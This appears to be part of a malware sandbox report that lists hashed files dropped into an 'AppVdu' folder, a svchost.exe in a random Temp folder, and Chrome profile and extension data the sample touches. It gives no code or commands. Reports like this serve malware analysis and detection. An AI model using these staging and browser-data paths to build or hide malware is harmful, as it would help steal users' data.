| MD5 | 0db821923216fdd29f3ef752b67e0683 |
| SHA1 | 4496a5ec7f08167faa3d2db4c225b962ece339c2 |
| SHA256 | 70e479fbbc65ec754a0b6cc031f0e699468a6d4479c327a6f7c0a04cdca6a109 |
| SHA512 | 15c35743c720b313daa65353b594967d90c8e67c69f5dfaf421e127afed0dcb42b09ce186d2359fd2579e9d835006ac3804742ba914062552f1a6e8b51a6dc05 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\libnpth-0.dll
| MD5 | a75aa079bab1f26fdf69b80f18e951c7 |
| SHA1 | 1f64fc9d9e8500e0e015b3874d55e652d84df799 |
| SHA256 | 8993c86367054b9f9e9ae517fd0025724d809832f8f6a9938a718cda23afb08c |
| SHA512 | 1834ca2e719baddafb6942d6ce7f45bdc14e95bb11fea968a052abaa03df5dc8d2703295fa15ba4c12f5ff14e842c805c1020f77618d6aba31b3127660b54300 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\libksba-8.dll
| MD5 | 083f7e514d6b982f09f77e21af38b447 |
| SHA1 | 69a69fe6328603f41429ddc67d1973f0f1b26c36 |
| SHA256 | 7df2d8c02d76fdb0ea0d64261fd6a7cbfed0ca9c8f53c13de9da1731261392c0 |
| SHA512 | dff1d23470fa15a724040e883ee8a421d9193fccb29bbdd33090795e9d106bb388a22cfa2ffe83332ab535087ae8a2883f90b991e466a9ec49b2c67142675ff4 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\gnupg.exe
| MD5 | e7a712a20275825b93d9b86464755870 |
| SHA1 | 64bd04917a18d2faa75c46470461d550733aea61 |
| SHA256 | 4e6f3f339ded64578816dfc3dc1d74ba198f7d698109c15ac658bb9891e2ea9e |
| SHA512 | c1ef6aca74b674386521a54c435524cd1adfb70e5fb43fee48929ba1ff631f7e2cba2c773fc6976c72b7095c0e8c73e0766a3977f2cb8798560cbaada9cfcec3 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\dirmngr.exe
| MD5 | 2e94c3258f7863b6bf4ea937aa12a144 |
| SHA1 | c5bf59d3b038f9bb9f7e05706e9e80f21ff3b022 |
| SHA256 | 2cc38c48eb742a28a4562bc62c9dca7ef525a62164752135b45a4cff89064e6e |
| SHA512 | 0925f11504f6972ede8525d3f7050060034a785963772a8b0f8d38d9feba47c1f9f55dafc959eea1d1789d8a4fbe03639c3f44ae848aef971d1a51371ce1fe2b |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\gpgsm.exe
| MD5 | c1bb0e52c1e07b706804c5262207852a |
| SHA1 | 741d5972d06c09f7eb3c85dd573e302ff80d55e4 |
| SHA256 | e7d50bfc7ea031e4438b227e5f3c1c231aac831ccb709b08f6d4e3106d448b5e |
| SHA512 | cd6d04bc70a77ee6299e2d7c0e832c1104fd16ffd0243e6bff36910850cccb17fca86a297369bb0cb7c19ef674adc2089aaac3fa173184ec1f93bbb123957295 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | 9c9b50b204fcb84265810ef1f3c5d70a |
| SHA1 | 0913ab720bd692abcdb18a2609df6a7f85d96db3 |
| SHA256 | 25a99bdf8bf4d16077dc30dd9ffef7bb5a2ceaf9afcee7cf52ad408355239d40 |
| SHA512 | ea2d22234e587ad9fa255d9f57907cc14327ead917fdede8b0a38516e7c7a08c4172349c8a7479ec55d1976a37e520628006f5c362f6a3ec76ec87978c4469cd |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-processthreads-l1-1-0.dll
| MD5 | e173f3ab46096482c4361378f6dcb261 |
| SHA1 | 7922932d87d3e32ce708f071c02fb86d33562530 |
| SHA256 | c9a686030e073975009f993485d362cc31c7f79b683def713e667d13e9605a14 |
| SHA512 | 3aafefd8a9d7b0c869d0c49e0c23086115fd550b7dc5c75a5b8a8620ad37f36a4c24d2bf269043d81a7448c351ff56cb518ec4e151960d4f6bd655c38aff547f |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-processenvironment-l1-1-0.dll
| MD5 | f43286b695326fc0c20704f0eebfdea6 |
| SHA1 | 3e0189d2a1968d7f54e721b1c8949487ef11b871 |
| SHA256 | aa415db99828f30a396cbd4e53c94096db89756c88a19d8564f0eed0674add43 |
| SHA512 | 6ead35348477a08f48a9deb94d26da5f4e4683e36f0a46117b078311235c8b9b40c17259c2671a90d1a210f73bf94c9c063404280ac5dd5c7f9971470beaf8b7 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-namedpipe-l1-1-0.dll
| MD5 | cff476bb11cc50c41d8d3bf5183d07ec |
| SHA1 | 71e0036364fd49e3e535093e665f15e05a3bde8f |
| SHA256 | b57e70798af248f91c8c46a3f3b2952effae92ca8ef9640c952467bc6726f363 |
| SHA512 | 7a87e4ee08169e9390d0dfe607e9a220dc7963f9b4c2cdc2f8c33d706e90dc405fbee00ddc4943794fb502d9882b21faae3486bc66b97348121ae665ae58b01c |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-memory-l1-1-0.dll
| MD5 | 808f1cb8f155e871a33d85510a360e9e |
| SHA1 | c6251abff887789f1f4fc6b9d85705788379d149 |
| SHA256 | dadbd2204b015e81f94c537ac7a36cd39f82d7c366c193062210c7288baa19e3 |
| SHA512 | 441f36ca196e1c773fadf17a0f64c2bbdc6af22b8756a4a576e6b8469b4267e942571a0ae81f4b2230b8de55702f2e1260e8d0afd5447f2ea52f467f4caa9bc6 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 8acb83d102dabd9a5017a94239a2b0c6 |
| SHA1 | 9b43a40a7b498e02f96107e1524fe2f4112d36ae |
| SHA256 | 059cb23fdcf4d80b92e3da29e9ef4c322edf6fba9a1837978fd983e9bdfc7413 |
| SHA512 | b7ecf60e20098ea509b76b1cc308a954a6ede8d836bf709790ce7d4bd1b85b84cf5f3aedf55af225d2d21fbd3065d01aa201dae6c131b8e1e3aa80ed6fc910a4 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-libraryloader-l1-1-0.dll
| MD5 | d75144fcb3897425a855a270331e38c9 |
| SHA1 | 132c9ade61d574aa318e835eb78c4cccddefdea2 |
| SHA256 | 08484ed55e43584068c337281e2c577cf984bb504871b3156de11c7cc1eec38f |
| SHA512 | 295a6699529d6b173f686c9bbb412f38d646c66aab329eac4c36713fdd32a3728b9c929f9dcadde562f625fb80bc79026a52772141ad2080a0c9797305adff2e |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | 41fbbb054af69f0141e8fc7480d7f122 |
| SHA1 | 3613a572b462845d6478a92a94769885da0843af |
| SHA256 | 974af1f1a38c02869073b4e7ec4b2a47a6ce8339fa62c549da6b20668de6798c |
| SHA512 | 97fb0a19227887d55905c2d622fbf5451921567f145be7855f72909eb3027f48a57d8c4d76e98305121b1b0cc1f5f2667ef6109c59a83ea1b3e266934b2eb33c |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | 5cce7a5ed4c2ebaf9243b324f6618c0e |
| SHA1 | fdb5954ee91583a5a4cbb0054fb8b3bf6235eed3 |
| SHA256 | aa3e3e99964d7f9b89f288dbe30ff18cbc960ee5add533ec1b8326fe63787aa3 |
| SHA512 | fc85a3be23621145b8dc067290bd66416b6b1566001a799975bf99f0f526935e41a2c8861625e7cfb8539ca0621ed9f46343c04b6c41db812f58412be9c8a0de |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | 285dcd72d73559678cfd3ed39f81ddad |
| SHA1 | df22928e43ea6a9a41c1b2b5bfcab5ba58d2a83a |
| SHA256 | 6c008be766c44bf968c9e91cddc5b472110beffee3106a99532e68c605c78d44 |
| SHA512 | 84ef0a843798fd6bd6246e1d40924be42550d3ef239dab6db4d423b142fa8f691c6f0603687901f1c52898554bf4f48d18d3aebd47de935560cde4906798c39a |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | 031dc390780ac08f498e82a5604ef1eb |
| SHA1 | cf23d59674286d3dc7a3b10cd8689490f583f15f |
| SHA256 | b119adad588ebca7f9c88628010d47d68bf6e7dc6050b7e4b787559f131f5ede |
| SHA512 | 1468ad9e313e184b5c88ffd79a17c7d458d5603722620b500dba06e5b831037cd1dd198c8ce2721c3260ab376582f5791958763910e77aa718449b6622d023c7 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-util-l1-1-0.dll
| MD5 | 735636096b86b761da49ef26a1c7f779 |
| SHA1 | e51ffbddbf63dde1b216dccc753ad810e91abc58 |
| SHA256 | 5eb724c51eecba9ac7b8a53861a1d029bf2e6c62251d00f61ac7e2a5f813aaa3 |
| SHA512 | 3d5110f0e5244a58f426fbb72e17444d571141515611e65330ecfeabdcc57ad3a89a1a8b2dc573da6192212fb65c478d335a86678a883a1a1b68ff88ed624659 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | 43e1ae2e432eb99aa4427bb68f8826bb |
| SHA1 | eee1747b3ade5a9b985467512215caf7e0d4cb9b |
| SHA256 | 3d798b9c345a507e142e8dacd7fb6c17528cc1453abfef2ffa9710d2fa9e032c |
| SHA512 | 40ec0482f668bde71aeb4520a0709d3e84f093062bfbd05285e2cc09b19b7492cb96cdd6056281c213ab0560f87bd485ee4d2aeefa0b285d2d005634c1f3af0b |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-sysinfo-l1-1-0.dll
| MD5 | 9d43b5e3c7c529425edf1183511c29e4 |
| SHA1 | 07ce4b878c25b2d9d1c48c462f1623ae3821fcef |
| SHA256 | 19c78ef5ba470c5b295dddee9244cbd07d0368c5743b02a16d375bfb494d3328 |
| SHA512 | c8a1c581c3e465efbc3ff06f4636a749b99358ca899e362ea04b3706ead021c69ae9ea0efc1115eae6bbd9cf6723e22518e9bec21f27ddaafa3cf18b3a0034a7 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-synch-l1-2-0.dll
| MD5 | d175430eff058838cee2e334951f6c9c |
| SHA1 | 7f17fbdcef12042d215828c1d6675e483a4c62b1 |
| SHA256 | 1c72ac404781a9986d8edeb0ee5dd39d2c27ce505683ca3324c0eccd6193610a |
| SHA512 | 6076086082e3e824309ba2c178e95570a34ece6f2339be500b8b0a51f0f316b39a4c8d70898c4d50f89f3f43d65c5ebbec3094a47d91677399802f327287d43b |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-synch-l1-1-0.dll
| MD5 | 6c3fcd71a6a1a39eab3e5c2fd72172cd |
| SHA1 | 15b55097e54028d1466e46febca1dbb8dbefea4f |
| SHA256 | a31a15bed26232a178ba7ecb8c8aa9487c3287bb7909952fc06ed0d2c795db26 |
| SHA512 | ef1c14965e5974754cc6a9b94a4fa5107e89966cb2e584ce71bbbdd2d9dc0c0536ccc9d488c06fa828d3627206e7d9cc8065c45c6fb0c9121962ccbecb063d4f |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-string-l1-1-0.dll
| MD5 | 7a15b909b6b11a3be6458604b2ff6f5e |
| SHA1 | 0feb824d22b6beeb97bce58225688cb84ac809c7 |
| SHA256 | 9447218cc4ab1a2c012629aaae8d1c8a428a99184b011bcc766792af5891e234 |
| SHA512 | d01dd566ff906aad2379a46516e6d060855558c3027ce3b991056244a8edd09ce29eacec5ee70ceea326ded7fc2683ae04c87f0e189eba0e1d38c06685b743c9 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\stylers.model.xml
| MD5 | 343b8f55f376e88674733286d027f834 |
| SHA1 | 466886054d5c2641ba6058f58a7a84053aa4696e |
| SHA256 | f002b36e70f0fb159885c21fa6e6395176cd50a254201a94cbed756d9843fa9a |
| SHA512 | ef6643badbb87739f0ae847d201651f8d3e677c54ca2aa3f81277b053355772f71d9b0f490617c104ce861a29e2b283fe6d82faf4cfe8f10bfc571d683cfea8e |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\libintl-8.dll
| MD5 | 16b4dba3e3bfdea7a528cc97721cbe60 |
| SHA1 | 2a75d604f72ea1d1d929280b6b945b168a18f137 |
| SHA256 | b6939316ebc272b67fa90a8c599dceec0e22b93a7a9660c7b0db0ff1cc1308ae |
| SHA512 | 4d524e689a064a2a1d381033f05f635f0e5cb5863d0c1dd1cee4bf80303e0bf3db8d787ff52d348c6938bacea7ac695de10da747782696d18172951452a98ef9 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\gpg-wks-client.exe
| MD5 | ee38ab14557b765c80856531582f4f89 |
| SHA1 | 660b872aaadd6658729f943f78bb45699e38f7c6 |
| SHA256 | 4b0dfcc928a127b65928f6a941823b0e43c4cf08e2792e1e054a3886d51d8005 |
| SHA512 | 4c4690c7af542ad5d67121259ec25dd67565273ea791f1a7e0536193f74115fb309054c44e336b19fee273dde71ab8543a2810a10dc2ba9eca5c7b286b46bcca |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\gpgtar.exe
| MD5 | a33215c3311b5819d6f12400b49333ab |
| SHA1 | 8d9338414b6e17cb9454b26b410abf7381e68eba |
| SHA256 | 45d80a39499a2dbfa3352169a7fb78492f7a253ca3ec6b0a6f61825b7c3a235d |
| SHA512 | 219fcc80b0362004ece4aeec22f93085166de6e8969b45c26f671412ff3b238c95e14f439a6efd8d06177fe790c781ddfd21e8a21a6100bfb8b08bd2e69d5973 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\gpg-check-pattern.exe
| MD5 | 6ca7632cc5d6007fb6d29e1a8624664e |
| SHA1 | 50400a3fa8ee23a8f6b492fbc92c34e40bec8bbd |
| SHA256 | 124698ea407083fde0664ac4e950ea55f60d880f8ed636a05473a0e92e592dde |
| SHA512 | 62c8de1381115e2d7f787791ab53385b9c112696f2d7163b1c9e014eead13d9550f8f916d614f18ff791c23187ec987fd749e80fc4b376104ae6c1b6b0a0fc37 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\libassuan-0.dll
| MD5 | 4f1849e84694314b868505c1dcc53747 |
| SHA1 | 06b8274e2569b32b5f9cf36202952e70b2fb4b02 |
| SHA256 | f69073ed88c6e72ae3244ca310bb43892eb97a4ede9e20fa457e0d8fb72a3b24 |
| SHA512 | 1956d6a9963b5eb712e7e61bccb3846677622838889b3de1820cc99f0b2aec81e3fba3456275f06be0b6a9ec573a502b38de7f0d32393447b385cad53c426d50 |
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\zlib1.dll
| MD5 | f191ee2ae39bd67d4cc12c3667634d42 |
| SHA1 | e37aac8dc0da948eab6f24bbcd8495790cf99fd6 |
| SHA256 | df230f50a409db9ee949b9fdb10d7c08de03b5e3a0f72e7feb2618e436e1967a |
| SHA512 | 9e8d4eb00225cb646a8f5cbd8a36d9994150dd1b16029d9e9c0cdf5158f71642a761c887dcf680517a164770429f37f04412448351d9247f9cf2d2da6694c7ab |
C:\Config.Msi\e57acfc.rbs
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnppepmebaijhkghebgnogijhbmopafg\CURRENT
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe588d47.TMP
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000015
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000016
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00003e
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00006d
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00004c
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\406d7f972a375165_0
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\8dd2a49426d24942_0
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\1558c9e953f4a24f_0
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\8fd654a217dc1612_0
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\4411f9c41dbf3f28_0
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000018
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00004e
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00009b
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000b2
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000bb
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Default\_metadata\generated_indexed_rulesets\_ruleset1
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\Downloads\irizari8.rar
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnppepmebaijhkghebgnogijhbmopafg\MANIFEST-000001
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1